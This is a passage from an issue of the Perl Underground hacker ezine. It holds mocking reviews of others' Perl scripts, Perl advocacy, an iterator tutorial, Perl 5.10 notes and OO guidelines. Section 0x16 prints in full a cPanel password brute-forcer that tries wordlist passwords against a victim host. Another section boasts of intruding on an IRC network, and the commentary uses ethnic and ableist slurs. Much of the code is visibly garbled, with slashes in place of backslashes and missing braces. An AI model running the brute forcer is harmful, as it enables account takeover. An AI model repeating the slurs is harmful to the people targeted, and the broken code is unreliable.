    # Maybe nexttime try command line arguments, hmm?
    # perldoc -f shift
    # man Getopt::Long

sub getrecord{
    while($colcount < $colnum){ # Package vars...
       my $url =
       my $response = $ua->get($url); 
       my $content = $response->content;
       # Why are things suddenly lexical?
       # Cause you stole things right from the POD, you fucker
       if($content =~ m/value(.*)to/) { # You don't need to tell Perl its
					# got to match something genius.
	     open (RECORDS, '>>output.txt'); # And you claim to be a
						# security guy...
	     print RECORDS $1;
	     close (RECORDS); # Nice parens there.
    open (RECORDS, '>>output.txt'); 
    print RECORDS "$count/n";
    close (RECORDS);
    # ... *sigh*


while ($count < @recs[1]){ # Oh jesus..
    $colcount = 0; # here we thought this was a waste
		# then we realized you were using it in getrecord(),
		# because you don't know how to send parameters to subs
		# You can't program. Get lost.
print "Records saved to output.txt"; # No "/n" ?

# Do yourself a favor and save coding Perl for those of us who know how,
# okay?

-[0x11] # Modern impressions of Perl -------------------------------------

It has been an interesting development that while the world is warming up
to interpreted languages such as Python and Ruby, Perl support has not
increased very much.

This can be blamed, in large part, on Perl not having any shocking fresh
releases recently. Au contraire, we have been waiting on Perl 6 for a 
long, long time.

Perl is further hindered by its history: who wants to use the web language
of the 1990s? In the 90s, when people wanted to write truly horrible HTML
generators, they came to Perl. If this is the Perl you remember, it's time 
to take a step back and realize how much more Perl was, and how much more 
it is today.

I'm here to tell you the inside part of that story. Perl can more than
compete with other current languages. Further, Perl is an elite language,
above and beyond its competitors in significant ways.

Perl has been around for 20 years. 20 years of development. Ruby and PHP
are just trying to grasp unicode, for Christ's sake. That's a long way
from Perl having NATIVE unicode support since 2000. Just how much better 
Perl's unicode support is (a LOT better) could fill another rant, but that 
isn't the point - it is just an example of Perl's maturity.

See, maturity is an important concept. If you code Perl, you can build off
of 20 years of Perl-specific knowledge. The understanding of best practices 
in Perl has evolved to an art form. Many of the very gurus who slowly 
developed their knowledge over this time are still around, easily 
accessible. The actual Perl interpreter is something to be admired, and has 
undergone so many years of inspection (but is *still* being improved 
internally, including many ways for Perl 5.10).

Perl has CPAN (or "the CPAN" to purists). CPAN is an archive of Perl
modules, and no other language has anything like it at that scale. CPAN
has over 13,000 modules. Many of these have been developed for years, and 
are very stable. There are even websites out there to critique Perl modules, 
and evaluate their code quality. To put this in perspective, Python has a 
"package index", pypi, with over 3500 packages. However, these aren't 
modules - many are just random pieces of Python that currently complete some 
task. Some are good, but the general level of quality is much lower than the 
Perl source on CPAN. And they lack the amount or the time of review that 
happens with Perl modules. This isn't a knock on Python - you'd be hard 
pressed to find another language that does better in these areas. Perl is 
just way ahead of the field when it comes to libraries and community.

Why does this matter? Because if you use almost any language, you end up
in Lone Ranger mode - you have a base set of tools that you can trust, but
otherwise you are on your own. C is an obvious example, where you have a 
slim standard library for small tasks, and you can probably find some code 
online that does something like what you want to do. Coding in Python is 
like this, just to a lesser degree. You might find what you want on Pypi, 
if you're not doing something too original, but it could be shady, badly 
designed, unreliable, and very poorly investigated. 

On the other hand, in Perl you have a wide variety of well-established
modules, that are not only good, but are likely to be better than you
would make. You are not only creating more stable code by building off of
others' code, but you are more likely to be coding more "high level". That 
is, focusing on issues of structure, design, interface, and others.

Perl is well-documented. Very well-documented. Everything from the
internal workings, to the internal API, to the language, to the language
functions, to any respectable module, to everything else, is documented. On 
top of that, the world has built up an incredible amount of archived Perl 

Perl is portable. Your Perl code is very likely to work on any box that
has Perl installed, and has the modules you need. Perl (the program) will
compile on a massive list of operating systems. You can find pre-compiled 
binaries for a similar list, see Most Perl code 
will not need modifications to work on other operating systems, let alone 
modifications just to "compile" it (like you would with much C).

The language itself is very powerful. You can chain references as deep as
you want to create any kind of data structure you would like. You can
generate and pass anonymous subroutines. Perl has better regular 
expressions than anywhere else, and have continued to lap the field with 
Perl 5.10 improvements. Modules are easy to create and inherit from. The 
language is incredibly flexible to use, and everything is easy. And on and 
on and on.

Perl makes it much easier to write correct and secure code than most
languages. On top of simply being a well-developed, mature, interpreted
language, Perl provides strict, warnings, and taint mode to assist you.

Coding in Perl goes long past just trying to make it work - that's often
incredibly easy. Perl coding becomes about just how to make it work, to be
clean, resource friendly, and maintainable. Combined with the extensive 
code archive and well-established practices, Perl is a very high-level

Perl is popular. It doesn't have the popularity of C*, .NET, or Java, but
it also doesn't have massive corporate backing nor is it taught
extensively by colleges. Perl is the king of interpreted languages, and if 
you are a good coder who codes good Perl, there is a job out there for you.

So if you are tired of dealing with the bugs of your language, or you're
tired of spending a majority of your coding effort on menial tasks, try
Perl. Look at other languages too - Python, Ruby, C, Java, these are all 
fine languages with positive sides, and they might be right for your 
project. But don't hold an old, outdated, prejudice against Perl. Remember 
that while other languages have developed quickly, they are still playing 
catch-up, while the last few years of work on Perl can be seen as invested 
in Perl 5.10 and Perl 6, both of which are big improvements from whatever 
Perl you remember.

-[0x12] # Some wit about iterators ---------------------------------------

Recursive algorithms are often simple and intuitive. Unfortunately, they
are also often explosive in terms of memory and execution time required.

Take, for example, the N-choose-M algorithm: 

# Given a list of M items and a number N,
# generate all size-N subsets of M
sub choose_n {
    my $n = pop;
    # Base cases
    return []	if $n == 0  or $n > @_;
    return [@_] if $n == @_;
    # otherwise..
    my ($first, @rest) = @_;
    # combine $first with all N-1 combinations of @rest,
    # and generate all N-sized combinations of @rest
    my @include_combos = choose_n(@rest, $n-1);
    my @exclude_combos = choose_n(@rest, $n);
    return ( (map {[$first, @$_]} @include_combos)
	 , @exclude_combos );

Great, as long as you don't want to generate all 10-element subsets of a
20-item list. Or 45-choose-20. In those cases, you will need an iterator.
Unfortunately, iteration algorithms are generally completely unlike the
recursive ones they mimic. They tend to be a lot trickier. 

But they don't have to be. You can often write iterators that look like
their recursive counterparts — they even include recursive calls — but
they don't suffer from explosive growth. That is, they'll still take a
long time to get through a billion combinations, but they'll start
returning them to you right away, and they won't eat up all your memory. 

The trick is to create iterators to use in place of your recursive calls,
then do a little just-in-time placement of those iterator creations. 
So let's take a first stab at choose_n. First, our base cases are going to
be subs that return whatever they were returning before, but after
returning those values once, they don't return anything anymore: 

sub iter_choose_n {
    my $n = pop;
    # Base cases
    my $once = 0;
    return sub {$once++ ? () : []} if $n == 0  or $n > @_;
    my ($first, @rest) = @_;
    return sub {$once++ ? () : [$first, @rest]} if $n == @_;

Apart from the iterator trappings, we've got essentially what we had
before. Converting the map into an iterator involves some similar work,
but the parallels are still pretty obvious. We exhaust the first iterator
before turning to the second: 

    # otherwise..
    my $include_iter = iter_choose_n(@rest, $n-1);
    my $exclude_iter = iter_choose_n(@rest, $n);
    return sub {
	if (my $set = $include_iter->()) {
	    return [$first, @$set];
	else {
	    return $exclude_iter->();

We now have a recursively-defined iterator that wasn't a heck of a lot
more complex than our original algorithm. That's the good news. The bad
news is: it's still doubly recursive, O(2^N) in space and time, and so
will take a long time to start generating data. Time for a little trick.
Because we don't use $exclude_iter until we've exhausted $include_iter, we
can delay defining it: 

    # otherwise..
    my $include_iter = iter_choose_n(@rest, $n-1);
    my $exclude_iter;
    return sub {
	if (my $set = $include_iter->()) {
	    return [$first, @$set];
	else {
	    $exclude_iter ||= iter_choose_n(@rest, $n);
	    return $exclude_iter->();

Now our code is singly recursive, O(N) in space and time to generate an
iterator, and that makes a big difference. Big enough that you probably
won't need to go to the trouble of coming up with an O(1) truly iterative

Of course, if you complete the iterations, eventually you will have
generated those 2^N subs, and they'll clog up your memory. You may not be
concerned about that (you may not be expecting to perform all that many
iterations), but if you are, you can put a little code in to free up
exhausted iterators: 

    # otherwise..
    my $include_iter = iter_choose_n(@rest, $n-1);
    my $exclude_iter;
    return sub {
	if ($include_iter and my $set = $include_iter->()) {
	    return [$first, @$set];
	else {
	    if ($include_iter) {
		undef $include_iter;
		$exclude_iter = iter_choose_n(@rest, $n);
	    return $exclude_iter->();

-[0x13] # Some gumhead named Gumbie --------------------------------------


Subject: Your zine

Fellow dispensers of justice,

Not all of our spoils from our hacks make it into our zine. Some of them are
left out simply because they are dull; others are left out due to space
constraints and still others are omitted because we cannot think of a good
way to present them, or we know someone who can do it better.

This is one such case. During our romp through the HellBound Hackers' IRC
network, we came across this Perl script that one of the IRC opers/server
admins there (specifically Gumbie) had written in an attempt to catch
people running privileged processes on his servers.

The code quality was terrible, and provided us for a good laugh. There were
also various design issues. Come on, a monitoring program that does no
integrity checking of its logs or itself? Not to mention that the whole
concept of the program screams "1992".

In any event, we decided to email this to you, and let the real experts
of the field handle this one. Hope it amuses you as well as your readers.


# Sure thing. 
# For future reference, we encourage material contributions (and rarely
# turn them down, even if the target is some random loser we've never
# heard of.

# Did you do all this tabbing yourselves or did it come like this?


	# Dump all the information in the current process table
	use Proc::ProcessTable;

	# Oh god, package variables! Run for your lives!
	$t = new Proc::ProcessTable;
	@list = ""; # Now that's eleet right there.
	@exclude = (1001); # ... and so is that

	foreach $p (@{$t->table}) { # Not bad.. but foreach() ? C'mon...
				    # get with the times! for()
#	  print "--------------------------------/n";
	 # fill array will all the euid root procs
	 foreach $f ($t->fields){ # See the above comment
#	    print $f, ":  ", $p->{$f}, "/n";
	   if (($f =~ /euid/) && ($p->{$f} eq 0)){ # && eh? Try using the
                     # 'and' operator. And way to use a string comparison 
		   # expression in a numeric comparison.
		push(@list, $p); # Learn Perl's grep, cum rag.

#print @list
	foreach $p (@list) { # You really like foreach(), don't you?
#	  print "--------------------------------/n";
#	  print "pid: ", $p->{pid}, " uid: ", $p->{uid}, " euid: ",
$p->{euid}, " ppid: ";
#	  print $p->{ppid}, " ", $p->{cmndline}, "/n";

	  # Find all the ones not direct children of init
	  if (($p->{ppid} != 1) && ($p->{ppid} != 0)) { 
# Hey, you got the right comparison types! But you still used &&
# and you didn't need the != 0 in the second
# Or just do -> if
($p->{ppid} > 1)
#	    print "pid: ", $p->{pid}, " ppid: ", $p->{ppid}, "/n";
	    push(@cmp, $p); # Do all these arrays bother anyone else?
	# Lets find all the parent owners
	foreach $c (@cmp) {
	  foreach $p (@{$t->table}) {
#print $p->{pid},"/n";
	   if ($c->{ppid} eq $p->{pid}) { # Again, it's a PID, therefore
it's *numeric*. Why are you using eq ?
	       if (($p->{ppid} != 1) && ($p->{ppid} != 0)) { 
# if ($p->{ppid} > 1) {
#print $p->{ppid}, "/n";
		 foreach $o (@{$t->table}) { # Good god...
		  if ($o->{pid} eq $p->{ppid}) { 
#print $o->{pid}, "/n";
		    $puid = $o->{uid};
		 } # if ($puid) {
		if ($puid != 0) {
		 undef $flag; # Real slick gumbie. Real slick.
		 foreach $e (@exclude) {
		  if ($e eq $puid) { $flag = 1; } 
# Yea. That's totally how we do oneline if()'s in Perl. 
		  if (!defined($flag)) { 
# Lose the '!' and go with 'not'. And you don't need the defined() function
		    print "e: ", $e, " pid: ", $p->{pid}, " ppid: ",
$p->{ppid}; # No newline?
		    print " puid: ", $puid, " Name: ",$p->{cmndline},
		    #kill SIGKILL, $p->{pid};
		    $date = `date`; 
# Because Perl doesn't have builtin functions for that.
		    chomp $date; # Because you can't oneline that.
		    open(LOGFILE, ">>/home/gumbie/.sec/log"); 
# What is it with people's obsession with not using the three
# argument open() call or checking its return status?
		    print LOGFILE "<===Tiggered by UID: $puid, PID
$p->{pid} killed successfully at $date ===>/n/n"; 
# Anyone want to edit a logfile?
		    close LOGFILE; 
		 undef $flag; # Nice. Classy.

# No exit?
# Wow that was shitty. All those pointless loops and random variables. It
# was a nightmare to follow.
# Please, gumbie, do the world a favor and never code anything ever again.

-[0x14] # The promised Perl 5.10 details, from grinder -------------------

Here are some things of the top of my head that I think are pretty cool:

state variables 
	No more scoping variables with an outer curly block, or the
        naughty my $f if 0 trick (the latter is now a syntax error). 
	No more $x = defined $y ? $y : $z, you may write $x = $y // $z
regexp improvements 
	Lots of work done by dave_the_m to clean up the internals, which
        paved the way for demerphq to add all sorts of new cool stuff.
smaller variable footprints 
	Nicholas Clark worked on the implementations of SVs, AVs, HVs and
        other data structures to reduce their size to a point that happens 
        to hit a sweet spot on 32-bit architectures 
smaller constant sub footprints 
	Nicholas Clark reduced the size of constant subs (like use
        constant FOO => 2). The result when loading a module like POSIX is
stacked filetests 
	you can now say if  (-e -f -x $file). Perl 6 was supposed to allow
        this, but they moved in a different direction. Oh well.
lexical $_ 
	allows you to nest $_ (without using local).
_ prototype 
	you can now declare a sub with prototype _. If called with no
        arguments, gets fed with $_ (allows you to replace builtins more 
x operator on a list 
	you can now say my @arr = qw(x y z) x 4. (Update: this feature was
        backported to the 5.8 codebase after having been implemented in blead,
        which is how Somni notices that it is available in 5.8.8).
	a true switch/given construct, inspired by Perl 6
smart match operator (~~) 
	to go with the switch
closure improvements 
	dave_the_m thoroughly revamped the closure handling code to fix a
        number of buggy behaviours and memory leaks.
faster Unicode 
	lc, uc and /i are faster on Unicode strings. Improvements to the
        UTF-8 cache.
improved sorts 
	inplace sorts performed when possible, rather than using a
        temporary. Sort functions can be called recursively: you can sort a 
map in void context 
	is no longer evil. Only morally.
less opcodes 
	used in the creation of anonymous lists and hashes. Faster pussycat!
tainting improvements 
	More things that could be tainted are marked as such (such as
        sprintf formats)
$# and $* removed 
	Less action at a distance
perlcc and JPL removed 
	These things were just bug magnets, and no-one cared enough about

update: ok, in some ways that's just a rehash of perldelta, here's the
executive summary:

There has been an awful lot of refactoring done under the hood. Andy
"petdance" Lester added const to just about everything that it was
possible to do, and in the process uncovered lots of questionable
practices in the code. Similarly, Nicholas Clark and Dave Mitchell nailed
down many, many, many memory leaks.

Much of the work done to the internals results in a much more robust
engine. Far likelier err, less likely, to leak, or, heavens forbid, dump
core. If you have long running processes that chew through datasets and/or
use closures heavily, that is a good reason to upgrade.

For new developments, there are a number of additions at the syntax level
that make writing Perlish code even better. Things like Mark-Jason
Dominus's book on Higher Order Perl makes heavy use of constructs such as
closures that tend to leak in 5.8. If this style of programming becomes
more widespread (and I hope it does, because it allows one to leverage the
power of the language in extraordinary ways) then 5.10 will be a better

Years ago, having been bitten by nasty things in 5.6, I asked Does 5.8.0
suck?. As it turns out, it didn't. I think that 5.10 won't suck, either.
One big thing that has changed then is that far more people are smoking
all sorts of weird combinations of build configurations on a number of
different platforms, and many corrections are being made as a result of
that. Things that otherwise would have forced a 5.10.1 to be pushed out in
short order.

-[0x15] # Reading material -----------------------------------------------

There is a common misinterpretation that Perl Underground is just here to
make people feel bad about themselves. That isn't true. We're genuinely
interested in advocating Perl use, and improved Perl programming. We just
aren't being nice about it. Then again, the people who talk shit about us
probably just read the TOC and the insults of themselves or people they 

People need to go back to the basics. Read some documentation. I'll even
provide links to the cute online perldoc.

Syntax      -
Data types  -
Subroutines -
Operators   -
Functions   -
Regex       -
References  -
Structures  -

That's a really great list to go over. There's something entertaining for
everybody. Some have been updated for Perl 5.10. Have some fun and read
everything else on

-[0x16] # Hessam-x needs schooling (and not just for English) ------------

Perl Underground talk about exploiters perl codes. in this ezine they 
focused on bad perl codes. this is really nice .
Read this ezine on

# The above quote comes from Hessam-x' website from quite a while back. 
# It's good that he likes our zine, we like that, but all the more reason
# to make sure he improves his Perl!

# Cpanel Password Brute Forcer
# ----------------------------
#    (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
use IO::Socket;
use LWP::Simple;
use MIME::Base64;

# Need we say it? strict and warnings.

# my ($host, $user, $port, $list, $file) = @ARGV;
# you could at least be shifting
$host     = $ARGV[0];
$user     = $ARGV[1];
$port     = $ARGV[2];
$list     = $ARGV[3];
$file     = $ARGV[4];
$url = "http://".$host.":".$port;

# Do this check BEFORE the assignments
if(@ARGV < 3){

# I like the random capitalization decisions. 
print q(
#               Cpanel Password Brute Force Tool              #
#     usage : [HOST] [User] [PORT] [list] [File]    #
#    [Host] : victim Host             (        #
#    [User] : User Name               (demo)                  #
#    [PORT] : Port of Cpanel          (2082)                  #
#    [list] : File Of password list   (list.txt)              #
#    [File] : file for save password  (password.txt)          #
#                                                             #
#            (c)oded By Hessam-x /             #


# Why would you quote a number? Because it's negative??
$numstart  = "-1";

sub headx() {
print q(
#              Cpanel Password Brute Force Tool               #
#            (c)oded By Hessam-x /             #

# Put some of your own fucking blank lines in here
# Not to mention either your adamant refusal to indent, or your
# inability to publish on the internet. We don't care to figure 
# out which one is screwing this code.

# Lame open format, and lame that you just read and then process.
# while ( <$passfile> ) { # etc
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
foreach my $P (@PASSWORDS) {
chomp $P; # uh...
$passwd = $P; # uh...
print "/n [~] Try Password : $passwd /n";
sub brut() {
# How about you learn how to send parameters to functions, retard
$authx = encode_base64($user.":".$passwd);
print $authx;

# How could you recommend PU and not even know to not 
# unnecessarily quote variables?
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", 
	PeerPort => "$port") || print "/n [-] Can not connect to the host";

# Is it offtopic to point out that you should have a host request, 
# and be using CRLFs, for starters?
print $sock "GET / HTTP/1.1/n";
print $sock "Authorization: Basic $authx/n";
print $sock "Connection: Close/n/n";
read  $sock, $answer, 128;

if ($answer =~ /Moved/) {
print "/n [~] PASSWORD FOUND : $passwd /n";

# Was there a single line in that whole script that didn't suck like a horny 
# paki? Short and shitty. We went extra easy because you're a fan  :-D 

-[0x17] # Ovid discusses object-oriented programming ---------------------


Often Overlooked Object Oriented Programming Guidelines


The following is not about how to write OO code in Perl. There's plenty of
nodes covering that topic. Instead, this is a general list of tips that I
like to keep in mind when I'm writing OO code. It's not exhaustive, but it
does cover a number of areas that I see many people (including myself),
get wrong or overlook.


Useless OO

Don't use what you don't need.
Don't use OO if you don't need it. No sense in creating an object if there
is nothing to encapsulate. 

    sub new {
	my ($class,%data) = @_;
	return bless /%data, $class;

This constructor is not unusual, but it's suggestive of a useless use of
OO. A good example of this is Acme::Playmate (er, maybe not the best
example). The module is comprised of a constructor. That's it. And here's
the documented usage:

    use Acme::Playmate;

    my $playmate = new Acme::Playmate("2003", "04");

    print "Details for playmate " . $playmate->{ "Name" } . "/n";
    print "Birthdate" . $playmate->{ "BirthDate" } . "/n";
    print "Birthplace" . $playmate->{ "BirthPlace" } . "/n";

Regardless of whether or not you feel this is a useful module, there's
nothing OO about it. In fact, with the exception of methods this module
inherits from UNIVERSAL::, it has no methods other than the constructor.
All it does is return a data structure that just happens to be blessed
(the jokes are obvious; we don't need to go there).

Of course, this is merely an Acme:: module, so discussing how well a joke
conforms to good programming practices is probably not warranted, but read
through Damian Conway's 10 Rules for When to Use OO to get a good feel for
when OO is appropriate.

Object Heirarchy

Don't subclass simply to alter data

Subclass when you need a more specific instance of a class, not just to
change data. If you do that, you simply want an instance of the object,
not a new class. Subclass to alter or add behavior. While I don't see this
problem a lot, I see it enough that it merits discussion. 

    package Some::User;

    sub new {
	bless {}, shift;
    sub user { die "user() must be implemented in subclass" }
    sub pass { die "pass() must be implemented in subclass" }
    sub url  { die "url() must be implemented in subclass" }

On the surface, this might appear to simply be an interface that will be
used as a base class for a set of classes. However, sometimes people get
confused and simply override those methods to return data:

    package Some::User::Foo;
    sub user { 'bob' }
    sub pass { 'seKret' }
    sub url  { '<a href=""></a>' }

There's really no reason for that. Make it an instance:

    my $foo = Some::User->new('Foo');

Thus, if you need to change how things work internally, you're doing that
on only one class rather than hunting through a bunch of useless

Law of Demeter

The Law of Demeter simply states that you should only talk to your
immediate friends -- using a chain of method calls to navigate an object
heirarchy is begging for trouble. For example, if an office object has a
manager object, an instance of that manager might have a name. 

    print $office->manager->name;

That seems all fine and dandy. Now, imagine that you have that in 20
places in your code, but in the manager class, someone changes name to
full_name. Because the code using the office object was forced to walk
through the object heirarchy to get at the data it actually needs, you've
created fragile code. Now the manager class must support a name method to
be backwards compatible (and we get to start on our big ball of mud), or
every reference to it must be changed -- but we've created far too many.

The solution is to do this:

    print $office->manager_name; # manager_name calls $manager->name

Now, instead of hunting down all of the places where this was accessed,
we've limited this call to one spot and made maintenance much easier. This
can, however, lead to code bloat. Make sure you understand the tradeoffs

Liskov substitution principle

While there is disagreement over what this means, this principle states
(paraphrasing) that a subclass must present the same interface as its
superclass. Some argue that the behavior or subclasses (or subtypes)
should not change, though I feel that with proper encapsulation, this
distinction goes away. For example, imagine a cash register program where
a person's order is paid via a combination of credit card, check, and cash
(such as when three people annoy the waiter by splitting the bill). 

    foreach my $tender (@tenders) {

In this case, let's assume there is a Tender::Cash superclass and
subclasses along the lines of Tender::CreditCard and
Tender::LetsHopeThisDoesntBounce. The credit card and check classes can be
used exactly as if they were cash. Their apply() methods are probably
different internally, but every method that's available for cash should be
available for the subclasses and data which is returned should be
identical in form. (this might be a bad example as a generic Tender
interface may be more appropriate).

Another example is HTML::TokeParser::Simple. This is a drop-in replacement
for HTML::TokeParser. You don't need to change the actual code, but you
can then use all of the extra nifty features built in.


Don't encourage promiscuous behavior
Hide your data, even that data which is public. Provide setters and
getters for properties (accessors and mutators, if you prefer), rather
than allowing people to reach into the object. Use these internally, too.
You need them as much as users of your code need them. 


This is a common idiom, but it's an example of an anti-pattern. What
happens when you want to change that to an array ref? What happens when
you want to use inside-out objects? What happens when you want to validate
an assignment to this value?

All of these issues and more crop up when you let people reach into the
object. One of the major points of OO programming is to allow proper
encapsulation of what's going on inside of the object. As soon as you let
your defensive programming guard down, you're going to get bug reports.
Use proper methods to handle this:


Don't expose state if you don't have to.

    if ($object->error) { 
    } # bad!

Whoops! Now we have a problem. Not only does every place in the code that
might want to log errors have to first check if those errors exist, your
log_errors method might erroneously assume that this has been checked.
Check the state inside of the method.

    sub log_errors {
	my $self = shift;
	return $self unless $self->error;

Better yet, there's a good chance that you're not concerned about the
error log at runtime, so you could simply specify an error log in your
constructor (or have the class use a default log), and let the module
handle all of that internally.

    sub connect {
	my $self = shift;
	unless ($self->_get_rss_feed) {

In the above example, there's an error that should be noted, but since a
cached copy of data is acceptable, there's no need for the program to deal
with this directly. The object notes the problem internally, adopts a
fallback remedy and everything is peachy.
Keep your data structures uniform
(I saw this on use.perl but I can't remember who posted it) 

Assuming that a corresponding mutator exists, accessors should return a
data structure that the mutators will accept. The following must always

    $object->set_foo( $object->get_foo );

Failure to do this will cause no end of grief for programmers who assume
that that the object accepts the data structures that it emits.



Create a method (be cautious about overloading string conversions for
this) to dump the state of an object. Many simply use YAML or
Data::Dumper, but having a nice, human readable format can mean a world of
difference when trying to debug a problem. 

Here's the YAML dump of a hypothetical product. Remember that, amongst
other things, YAML is supposed to be human-readable.
    --- #YAML:1.0 !perl/Product
    bin: 19
      category: 7
      cost: 2.13
      name: Shirt
      price: 3.13
    id: 7
    inv: 22
    modified: 0

Now here's hypothetical as_string() output that might be used in debugging
(though you might want to tailor the method for public display).
    Product 7
    Name:      Shirt
    Category:  Clothing (7)
    Cost:      $2.13
    Price:     $3.13
    On-hand:   22
    Bin:       Aisle 3, Shelf 5b (19)
    Record not modified

That's easier to read and, by doing lookups on the category and bin ids,
you can present output that's easier to understand.


I've saved the best for last for a good reason. Write a full set of tests!
One of the nicest things about tests is that you can ask someone to run
them if they submit a bug report. Failing that, it's a perfect way to
ensure that a bug does not return, that your objects behave as documented
and that you don't have ``extra features'' that you weren't expecting. 

One of the strongest objections to OO perl is the idiomatic object

    sub new {
	my ($class, %data) = @_;
	bless /%data => $class;

Which can then be followed with:
    sub set_some_property {
	my ($self, $property) = @_;
	$self->{some_prorety} = $property; # (sic)
	return $self;

    sub some_property { $_[0]->{some_property} }

And the tests:
		'Setting a property should succeed');
    is($object->some_property, $foo,	 
	"... and fetching it should also succeed");

Because blessing a hash reference is the most common method of creating
objects in Perl, we lose many of the benefits of strict. However, a proper
test suite will catch issues like this and ensure that they don't recur.
On a personal note, I've noticed that since I've begun testing, I
sometimes forget to use strict, but my code has not been suffering for it.
In fact, sometimes it's better because I frequently write code for which
strict would be a hassle, but that's another example of where the rules
get broken, but they're broken because the programmer knows when to break

Yet another fascinating thing about tests is the freedom they give you. If
you have a comprehensive test suite, you can start taking liberties with
your code in a way that you haven't before. Are you having performance
problems because you're using an accessor in the bottom of a nested loop?
If the object is a blessed hashref, you might get quite a performance
boost by just ``reaching inside'' and grabbing the data you need directly.
While many will tell you this is a no-no, the reason they mention this is
for maintainability. However, a good test suite will protect you against
many of the maintainability problems you may face (though it still won't
make fixing your encapsulation violations any easier once you are bitten).

That last paragraph might sound a bit curious. Is Ovid really telling
people it's OK to violate encapsulation, particularly after he pointed out
the evils of it?

Yes, I am saying that. I'm not recommending that, but one thing that often
gets lost in the shuffle when ``paradigm'' flame wars begin is that
programming is a series of compromises. Rare indeed is the programmer who
has claimed that she's never compromised the integrity of her code for
performance, cost, or deadline pressures. We want to have a perfect system
that people will ``ooh'' and ``aah'' over, but when you see the boss
coming down the hall with a worried look, you realize that the latest
nasty hack is going to make its way into production. Tests, therefore, are
your friend. Tests will tell you if the nasty little hack works. Tests
will tell you when the nasty little hack breaks.

Test, damn you!


Many Perl programmers, including myself, learned Perl's OO syntax without
knowing much about object-oriented programming. It's worth picking up a
book or two and doing some reading about OO theory and pick up some of the
tricks that, upon reflection, seem so obvious. Let the object do the work
for you. Hide its internals carefully and don't force the programmer to
worry about the object's state. All of the guidelines above can be broken,
but knowing about them and why you want to follow them will tell you when
it's OK to break them.

Update: I really should have called this "Often Overlooked Object Oriented
Observations". Then we could refer to this node as "'O'x5".


-[0x18] # TS/SCI Security, 'cause we need more bullshit ------------------

use strict;
use File::Find;

# Kickass spacing there. And you forgot to enable warnings.

# Get date and open log
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time); # Wow...
my $date = sprintf("%4d-%02d-%02d", $year+1900, $mon+1, $mday); # ... 
my $logname = sprintf("audit-%4d%02d%02d.log", $year+1900, $mon+1, $mday); 
my $logdir = '~/log/';
my $time = sprintf("%02d:%02d:%02d", $hour, $min, $sec); # This is looking alot like C.
# sprintf has its uses, but this was unnecessary.

my $datetime = "$date $time"; 
# Why did you bother creating $date and $time to being with? Extra scalars.

# You know that all your little formatting stuff is lame, right? 
# Why not just use the localtime as it's returned? 
# At least you did localtime(time) though. That's something.

open (LOG, ">>$logdir/$logname") || die; # REAAALLL slick...
print LOG "/nDATE: $datetimen"; # Yea, that came typo'ed like that.

# Find all files under this directory
find(/&handleFind, '/'); 
sub handleFind { # Again, great spacing. 
   my $foundFile = $File::Find::name;
   return unless ($foundFile =~ //.(csv|doc|pdf|rtf|txt|xls)?$/i); 
# Parens look goofy man.
   print "SEARCHING: $foundFile/n";
   open(FILE, "$foundFile"); # Way to quote the scalar there buddy.
   my $found = 0; # Great code design there.

# Our guess is that you meant while (<FILE>) but just were too fucking lame to notice
# that you lost at the internet. And yes, we did "view source" to be sure ;[
   while () {
       # Search documents for SSN's
       if (/([0-9]{3}-[0-9]{2}-[0-9]{4})/) { # Ah, the implicitness...
        	$found = $1; 
   print LOG "FOUND: $foundFile/n" if $found; # At least you know one-line if()'s
print "/nSearch completed. Wrote to file: $logdir$logname"; # No "/n" or / ?

# Thank god it's over at least.
# BTW, whitespace is your _FRIEND_! Learn to use it!

# TS/SCI security is a good example of some jerkoffs who want to put themselves somewhere in the blog
# scene but don't have any content to back them up. So they say "let's put up four or five really
# shitty scripts, in different languages, to show those blog-reading bitches that we've got skillz,
# but we're going to be too lame to actually get it right or notice the mistakes, and nobody will read
# our shit anyways so it's all good"
# Good thing we have talented people to poke fun at, otherwise we'd rip apart every fucking piece of
# code you penisgrabbers had up there.

-[0x19] # Shoutz and Outz ------------------------------------------------

That's all, folks. Thanks for coming out. Thanks to the people who helped out, and
to everyone who waited patiently. Shouts to everyone using Perl 5.10 already.

 ___	   _	_ _	  _	    ___ 		  _
| _ |	  | |  | | |	 | |	   |   |		 | |
|  _|_ ___| |  | | |___ _| |___ ___|  _|___ ___ _ _ ___ _| |
| | -_|  _| |  | | |   | . | -_|  _| | |  _| . | | |   | . |
|_|___|_| |_|  |___|_|_|___|___|_| |___|_| |___|___|_|_|___|

Forever Abigail

$_ = "/x3C/x3C/x45/x4F/x46/n" and s/<<EOF/<<EOF/ee and print;
"Just another Perl Hacker,"
